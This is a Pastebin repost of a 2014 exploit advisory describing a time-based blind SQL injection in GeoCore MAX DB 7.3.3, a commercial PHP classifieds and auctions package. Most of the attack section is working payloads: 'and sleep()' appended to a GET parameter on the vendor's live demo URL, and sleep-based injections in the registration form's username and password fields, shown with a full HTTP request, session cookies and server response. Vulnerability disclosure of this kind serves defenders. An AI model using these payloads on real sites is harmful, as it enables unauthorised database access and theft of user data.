Advertisement
Mayk0

#; GeoCore MAX DB 7.3.3 Blind SQL Injection Vulnerability

Apr 25th, 2014
189
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.15 KB | None | 0 0
  1. ============================================
  2. Full title GeoCore MAX DB 7.3.3 Blind SQL Injection Vulnerability
  3. Date add 2014-04-26
  4. Category local exploits
  5. Platform php
  6. Risk <font color="#FFFF00">Security Risk Medium</font>
  7. Description GeoCore MAX DB version 7.3.3 suffers from a time-based remote blind SQL injection vulnerability.
  8. ============================================
  9.  
  10. ###########################################################################################
  11. #Exploit Title: GeoCore MAX DB Ver. 7.3.3 - Time-Based Blind Injection
  12. #Official site: http://geodesicsolutions.com
  13. #Risk Level: High
  14. #Demo : http://geodesicsolutions.com/demo/
  15. #Exploit Author: Esac
  16. #Homepage author : www.iss4m.ma
  17. #Last Checked: 25/04/2014
  18. ###########################################################################################
  19.  
  20.  
  21. +----------+
  22. | OVERVIEW |
  23. +----------+
  24.  
  25. GeoCore is the new name for all Geodesic Solutions software packages beginning with version 7.0.0.
  26.  
  27. The products previously known as:
  28.  
  29. GeoClassAuctions Enterprise
  30. GeoClassifieds Enterprise
  31. GeoClassifieds Premier
  32. GeoClassifieds Basic
  33. GeoAuctions Enterprise
  34. GeoAuctions Premier
  35. are now unified into a single product.
  36.  
  37. Sites running GeoCore may use both Classifieds and Auctions, or may turn off one or the other as needed. Additional item types may be added in the future.
  38.  
  39. GeoCore allows much greater flexibility for you, the customer: many features previously available only in the Enterprise-level software packages have been opened up to everyone, either as built-in features or Add Ons that may be purchased separately. With GeoCore, you now have the power to build exactly the type of site you want: add the features you need, leave the ones you don't, and add more Add Ons to your site at any time!
  40.  
  41. GeoCore is the next step forward for Geodesic Solutions, and a powerful revolution in the field of Classifieds and Auctions software. Contact us today to find out how GeoCore can help you!
  42.  
  43.  
  44. Geocore is a premium version {
  45.  
  46. GeoCore - Classifieds : $399.00 USD
  47. GeoCore - Auctions : $399.00 USD
  48. GeoCore - MAX : $499.00 USD
  49.  
  50. }
  51.  
  52. +-----------------------------------------------------------------------------------+
  53.  
  54.  
  55.  
  56. +--------------------------------+
  57. | Time-Based Blind Injection |
  58. +--------------------------------+
  59.  
  60. 1) param : b | method : GET
  61.  
  62. http://geodesicsolutions.com/demo/index.php?a=5&b=15 {Inject here}
  63.  
  64.  
  65. Real exploitation :
  66.  
  67. https://geodesicsolutions.com//demo/index.php?a=5&b=15 and sleep(2) &filterValue=1997&page=2&setFilter=cs_94
  68.  
  69. ==> will pause for 2 seconds and diplay the page after
  70.  
  71. https://geodesicsolutions.com//demo/index.php?a=5&b=15 and sleep(10) &filterValue=1997&page=2&setFilter=cs_94
  72. ==> will pause for 10 seconds and diplay the page after depending on load of files(imgs , css , js scripts)
  73.  
  74.  
  75.  
  76. 2) Vuln URL : /demo/register.php?b=1 | URL encoded POST input c[password] set to secret"=sleep(3)="
  77. Vuln Url: /demo/register.php?b=1 | URL encoded POST input c[username] set to Esac"=sleep(3)="
  78.  
  79. Example Real exploitation :
  80.  
  81. +---------------+
  82. HTTP headers : |
  83. +---------------+
  84.  
  85. POST /demo/register.php?b=1 HTTP/1.1
  86. Content-Length: 633
  87. Content-Type: application/x-www-form-urlencoded
  88. X-Requested-With: XMLHttpRequest
  89. Cookie: classified_session=2e766bb87b762c7461a4367f11f67b28; developer_force_type=MAX; master_auctions=off; master_classifieds=off; master_site_fees=on; classifieds=on; auctions=on; css_primary_tset=green_lite_primary; css_secondary_tset=black_secondary; admin_classified_session=d4f1b96a342a64fe272217ba14977f27; killmenothing
  90. Host: geodesicsolutions.com
  91. Connection: Keep-alive
  92. Accept-Encoding: gzip,deflate
  93. User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
  94. Accept: */*
  95.  
  96. c[address]=007 undertake&c[address_2]=007 undertake&c[agreement]=yes&c[business_type]=1&c[city]=Underground&c[company_name]=Infinity Security&c[email]=h@ck3r.cc&c[email_verifier]=h@ck3r.c&c[fax]=317-317-3137&c[firstname]=Esac&c[lastname]=Sec&c[password]=secret"=sleep(2)="&c[password_confirm]=acUn3t1x&c[phone]=010-239-1233&c[phone_2]=010-239-1233&c[sessionId]=5b6cb974e9eec4e7549c143885d82376&c[url]=1&c[username]=Esac&c[zip]=12345&force_validation=Submit Validation Results&locations[1]=1
  97.  
  98. +---------+
  99. Response |
  100. +---------+
  101.  
  102. HTTP/1.1 200 OK
  103. Date: Tue, 22 Apr 2014 19:36:20 GMT
  104. Server: Apache/2.2.15 (Red Hat)
  105. X-Powered-By: PHP/5.4.27
  106. Cache-Control: no-cache, must-revalidate
  107. Expires: Sat, 26 Jul 1997 05:00:00 GMT
  108. Set-Cookie: classifieds=on; path=/
  109. Set-Cookie: auctions=on; path=/
  110. Set-Cookie: classified_session=dea12eb168dc174537517f1688070116; path=/; domain=.geodesicsolutions.com
  111. Keep-Alive: timeout=15, max=100
  112. Connection: Keep-Alive
  113. Content-Type: text/html; charset=UTF-8
  114. Content-Length: 16043
  115.  
  116.  
  117. +--------------------------------------------------------------------------------------+
  118.  
  119. If you want peace of mind , do not find fault with others , rather learn to see your own faults. Learn to make the whole world your own , no one is a stranger, this whole world is your own :)
  120.  
  121. ============================================ WwW.Iss4m.Ma ============================================
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement